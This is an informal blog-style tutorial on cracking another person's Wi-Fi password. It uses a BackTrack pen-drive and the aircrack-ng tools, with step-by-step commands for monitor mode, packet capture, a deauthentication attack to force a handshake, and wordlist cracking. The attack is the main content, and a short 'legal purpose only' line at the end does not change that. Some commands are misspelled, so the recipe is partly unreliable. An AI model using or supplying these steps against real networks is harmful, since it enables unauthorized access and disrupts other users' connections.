Wifi Hacking

Ok now how to hack some ones wifi with the help of BACKTRACK 

Heres' the SECRET

Make a backtrack boot-able pen-drive :: Now how to make bootable backtrack pendrive => Click on me

after making backtrack bootable pendrive

insert the pendrive and open ur BACKTRACK in ur laptop :: Y laptops beacause laptops has wifi card (hardware) and software in it ::

Now open 3 things in backtrack

1st konsole 
2nd konsole 
and a notepad to copy paste some items 

You must know some words what they do 

wireless key - security key
essid - network name
ifconfig - Enables your wireless device
iwlist - lists available access points
iwconfig - configuring wireless connection
dhclient - to get an ip address via DHCP

IMP Note :: use space, lowercase, uppercase and spellings in right way then only commands will work ::

Now here are the steps to attack and get wifi password 

Open ur 1st konsole and type in 

airmon-ng (press enter)
airmon-ng start wlan0 (0 is zero) (press enter)
airodump-ng mon0 (0 is zero)

You can see bssid and stations (know as client mac)

now press ctrl+c for break

now copy the bssid and station into the notepad 

after copying it type this command in 1st konsole

airodump-ng -w capture --bssid (paste the bssid u copied) -c (channel no.) mon0 (0 is zero)

after the packets has been sent to around 10,000 or 20,000

most imp part we have to do handshake with wifi :: for handshake 

open 2nd console type in 

aireplay-ng --deauth 1 -a (paste the bssid) -c (paste the station) mon0

a handshake will be shown on 1st konsole 

now go back to the 1st knosole 

press ctrl+c 

then type 

aircrak-ng capture -01.cap -w ./wordlist.lst (press enter)

and vollllaaaa  here we go we have got the password of the wifi 

Now here is the best video tutorial demonstrated 
To download the Video => ClicK one me

For any query please mail = fraternity.contacts@gmail.com

Please use this for legal purpose only ::  its for education do not try on any ones wifi illegally ::

Soon i will be posting how to be safe from wifi hacking and even who is connected to ur wifi illegally :)